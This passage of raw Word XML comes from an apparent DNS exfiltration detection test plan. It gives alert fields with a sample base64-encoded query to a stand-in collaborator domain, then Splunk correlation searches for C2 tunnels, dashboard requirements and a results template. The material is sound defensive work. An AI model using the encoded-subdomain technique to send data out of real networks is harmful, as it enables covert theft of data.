                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>10.YY.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>YY.YY</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7EEA51D4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50257964" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>base_domain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48AEC0C0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Destination base domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="73257444" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>abc123.oastify.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="3BEC6425" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E523F67" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>fqdn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="34574955" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Full queried FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="13A4FF8C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>aGVsbG8.abc123.oastify.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="066F7988" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76CAA173" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>query_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="56A0B9F4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS record type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F0AA52C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>A / TXT / MX / CNAME / NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1CE42AFD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7D960349" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>entropy_score</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F090027" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Shannon entropy of subdomain labels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1757C318" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="615886D6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7851F962" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>label_length</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7BD91DC2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Length of subdomain portion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="535790BD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="165D8C46" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C39BA54" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>rule_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6DADE248" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Which detection rule triggered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="42CEE615" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="47929FC3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1DDB0856" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>rule_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76DB99D7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Human-readable rule name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61A9BBB3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding-agnostic entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1F27A021" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F07DE98" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4BF3567E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Action taken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="514A017B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>alert / block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="29CEC888" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E36E0AA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>query_count</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A55A8F5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Number of queries in detection window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="333F989F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CEFC8CB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F70737" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>9.2 Splunk Correlation Searches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC7903" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The SOC team should create the following Splunk correlation searches on top of the forwarded alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B2C1F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E789EC4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Multi-rule correlation: Same source IP triggers 2+ different rule IDs within 1 hour → escalate to P2 incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FA88F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Volume escalation: Same source trigger</w:t>
      </w:r>
      <w:r>
        <w:t>s &gt;50 alerts in 24 hours → escalate to P1 incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA24A3E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>New domain watch: DNS-E07b (novel domain) combined with any entropy rule → immediate SOC review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0713A1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Tunnel detection: DNS-E12a or DNS-E13a firing → immediate P1 escalation (active C2 tunnel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88B890" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311D6B8B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>9.3 Dashboard Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B37775" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Real-time alert feed with rule ID, source IP, destination domain, and action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFA93AE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Top 10 sources by alert count (rolling 24h)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B003B54" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Top 10 destination domains by unique subdomain count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0B312" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Entropy distribution histogram for all DNS queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712A42A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Timeline view: alerts over time, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>colour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-coded by rule ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130A504" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237686B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. Results Tracking Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD7BCF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Use this table during and after each testing session. Fil</w:t>
      </w:r>
      <w:r>
        <w:t>l in one row per scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74736ABF"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6"/>
        <w:gridCol w:w="1066"/>
        <w:gridCol w:w="1066"/>
        <w:gridCol w:w="1067"/>
        <w:gridCol w:w="1067"/>
        <w:gridCol w:w="1067"/>
        <w:gridCol w:w="1067"/>
        <w:gridCol w:w="1067"/>
        <w:gridCol w:w="1067"/>
      </w:tblGrid>
      <w:tr w:rsidR="005B2212" w14:paraId="5DA34A97" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="0AD31B39" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5FC81AAB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="1AB3FE78" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="06360E19" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>After N Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="62C79A04" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
